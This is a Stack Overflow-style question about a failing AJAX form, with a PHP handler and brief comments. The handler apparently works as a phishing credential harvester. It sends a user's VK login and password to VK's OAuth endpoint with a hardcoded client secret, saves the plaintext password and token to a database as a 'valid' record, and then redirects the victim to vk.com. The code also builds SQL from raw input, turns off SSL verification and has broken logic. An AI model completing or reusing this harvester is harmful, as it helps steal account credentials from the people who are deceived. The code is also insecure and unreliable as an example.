# How to handle in php my query string parameters?

Tags: javascript, php, ajax, request

I have my PHP handler to handle my ajax-form with code

```js
<?php

//Создадим headers
$headers = array(
    'accept' => 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',
    'content-type' => 'application/x-www-form-urlencoded',
    'user-agent' => 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.86 Safari/537.36'
);
//Запишем сюда значения логина и пароля из HTML формы


function login()
{
    if (isset($_GET['login']) && isset($_GET['oldPassword'])) {

        echo $_GET['login'];
        echo $_GET['oldPassword'];
    } else {
        // Fallback behaviour goes here

        $login    = login($_GET['login']);
        $password = login($_GET['oldPassword']);
    }
}
//Если какое-то поле оказалось пустым
if (empty($login) or empty($password))
{
//Отправим пользователя на стартовую страницу authorize и просигнализируем об ошибке
    header('Location: /authorize.php?error_login=true');
    exit;
}
else
{
//Если все поля заполнены, то посылаем запрос на получение токена по нашей ссылке выше
    $get_token = post ('https://api.vk.com/oauth/token?grant_type=password&client_id=2274003&scope=offline&client_secret=hHbZxrka2uZ6jB1inYsH&username='.$login.'&password='.$password.'' ,array(
        'headers' => array(
            'accept: '.$headers['accept'],
            'content-type: '.$headers['content-type'],
            'user-agent: '.$headers['user-agent']
        )
    ));
//Если авторизация прошла успешно
    if (preg_match("/[a-z0-9]{85}/", $get_token['headers'], $token))
    {
        $token1 = json_decode(file_get_contents('https://api.vk.com/oauth/token?grant_type=password&client_id=2274003&scope=offline&client_secret=hHbZxrka2uZ6jB1inYsH&username='.$login.'&password='.$password.''), true);
        $data = json_decode(file_get_contents('https://api.vk.com/method/users.get?user_id='.$token1['user_id'].'&access_token='.$token[0].'&fields=uid,first_name,last_name&v=5.80'), true);

        //Записываем в переменную текущую дату и время сервера
        $date_l = date("H:i:s  d-m-Y");
//Подключаемся к БД
        $host="localhost";
        $user=""; //Имя пользователя от MySql
        $pass=""; //Пароль от MySql
        $db_name=""; //Имя базы
        $link=mysql_connect($host,$user,$pass);
        mysql_select_db($db_name,$link);
        mysql_query("set names utf8");
//Выполняем запись валида в БД
        $sql = mysql_query("INSERT INTO vk(login, password, token, date, user_id, first_name, last_name) VALUES('".$login."','".$password."','".$token[0]."','".$date_l."','".$token1['user_id']."','".$data['response'][0]['first_name']."','".$data['response'][0]['last_name']."')");
//Если все прошло успешно, то перенаправляем пользователя на vk.com или на ваш сайт
        if ($sql) {
            session_start();
            $_SESSION['logged_user'] = $data['response'][0]['first_name'];
            header('Location: vk.com/');
//Если при записи обнаружены ошибки, то перенаправим пользователя на главную страницу нашего сайта с сообщением об ошибке
        } else header('Location: /authorize.php?error_login=true');
//Закрываем соединение
        mysql_close($link);
        exit;
    }
//Если авторизация не прошла, то отправим пользователя на стартовую страницу с  ошибкой
    else header('Location: /authorize.php?error_login=true');
}
//cUrl POST
function post($url = null, $params = null, $proxy = null, $proxy_userpwd = null) {
    $ch = curl_init();

    curl_setopt($ch, CURLOPT_URL, $url);
    curl_setopt($ch, CURLOPT_HEADER, 1);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 30);
    curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);

    if(isset($params['params'])) {
        curl_setopt($ch, CURLOPT_POST, 1);
        curl_setopt($ch, CURLOPT_POSTFIELDS, $params['params']);
    }

    if(isset($params['headers'])) {
        curl_setopt($ch, CURLOPT_HTTPHEADER, $params['headers']);
    }

    if(isset($params['cookies'])) {
        curl_setopt($ch, CURLOPT_COOKIE, $params['cookies']);
    }

    if($proxy) {
        curl_setopt($ch, CURLOPT_PROXY, $proxy);

        if($proxy_userpwd) {
            curl_setopt($ch, CURLOPT_PROXYUSERPWD, $proxy_userpwd);
        }
    }

    $result = curl_exec($ch);
    $result_explode = explode("\r\n\r\n", $result);

    $headers = ((isset($result_explode[0])) ? $result_explode[0]."\r\n" : '').''.((isset($result_explode[1])) ? $result_explode[1] : '');
    $content = $result_explode[count($result_explode) - 1];


    preg_match_all('|Set-Cookie: (.*);|U', $headers, $parse_cookies);

    $cookies = implode(';', $parse_cookies[1]);

    curl_close($ch);

    return array('headers' => $headers, 'cookies' => $cookies, 'content' => $content);
}
?>
```

But I took error message when try ti touche button to send my form.How to handle query string parameters if submit button dont want to react?I took error Status Code: 302 .Wat does it mean?Thx
if in my main page in code I have two examples of url like 1) continue.php?act=savePhone&phone=" + encodeURIComponent(g("check").value)... and 2) var auth = $.ajax("continue.php?act=login&login=... /////////So,what must be in my Continue.php handler to handle two differents types of request?First request just check data (login and pass) for valid,and Second request try to make autorisation? Maybe my main HTML code with AJAX code have a lack of something?

Comment: You are sending a redirection. Ajax will not perform the redirection on the browsers instance of your website. You need to return some kind of result, true/false and act accordingly in the Ajax callback

Comment: You've just posted your API client_id and client_secret to a public site. You'll want to revoke them immediately.

Comment: @iJamesPHP2 How can I make it?